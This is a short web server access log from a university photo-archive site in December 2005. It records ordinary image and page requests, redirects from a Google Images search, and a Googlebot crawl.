137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/small.dps.jpg HTTP/1.1" 200 5830 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/sitemap.gif HTTP/1.1" 200 1503 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/bar.gif HTTP/1.1" 200 342 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
137.229.70.149 - - [16/Dec/2005:15:42:40 -0900] "GET /index_files/bluebear.gif HTTP/1.1" 200 1263 "http://weston.elmer.uaf.edu/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"
68.163.112.130 - - [16/Dec/2005:15:42:53 -0900] "GET /store/women.html HTTP/1.0" 301 350 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(043)1964-0029-00313.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/women.html&h=615&w=1000&sz=140&tbnid=K2OfxnbrQ-AJ:&tbnh=91&tbnw=149&hl=en&start=20&prev=/images%3Fq%3Dhot%2Bwomen%26imgsz%3Dxxlarge%26svnum%3D10%26hl%3Den%26lr%3D" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.163.112.130 - - [16/Dec/2005:15:42:55 -0900] "GET /store/photos/largejpegs/(043)1964-0029-00313.jpg HTTP/1.0" 301 382 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(043)1964-0029-00313.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/women.html&h=615&w=1000&sz=140&tbnid=K2OfxnbrQ-AJ:&tbnh=91&tbnw=149&hl=en&prev=/images%3Fq%3Dhot%2Bwomen%26imgsz%3Dxxlarge%26svnum%3D10%26hl%3Den%26lr%3D&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.163.112.130 - - [16/Dec/2005:15:43:04 -0900] "GET /store/photos/largejpegs/(043)1964-0029-00313.jpg HTTP/1.0" 301 382 "http://images.google.com/imgres?imgurl=http://photolab.elmer.uaf.edu/store/photos/largejpegs/(043)1964-0029-00313.jpg&imgrefurl=http://photolab.elmer.uaf.edu/store/women.html&h=615&w=1000&sz=140&tbnid=K2OfxnbrQ-AJ:&tbnh=91&tbnw=149&hl=en&prev=/images%3Fq%3Dhot%2Bwomen%26imgsz%3Dxxlarge%26svnum%3D10%26hl%3Den%26lr%3D&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
66.249.65.35 - - [16/Dec/2005:15:43:33 -0900] "GET /gallery/photos/19640074/pages/1964-0074-00159.html HTTP/1.1" 200 5044 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
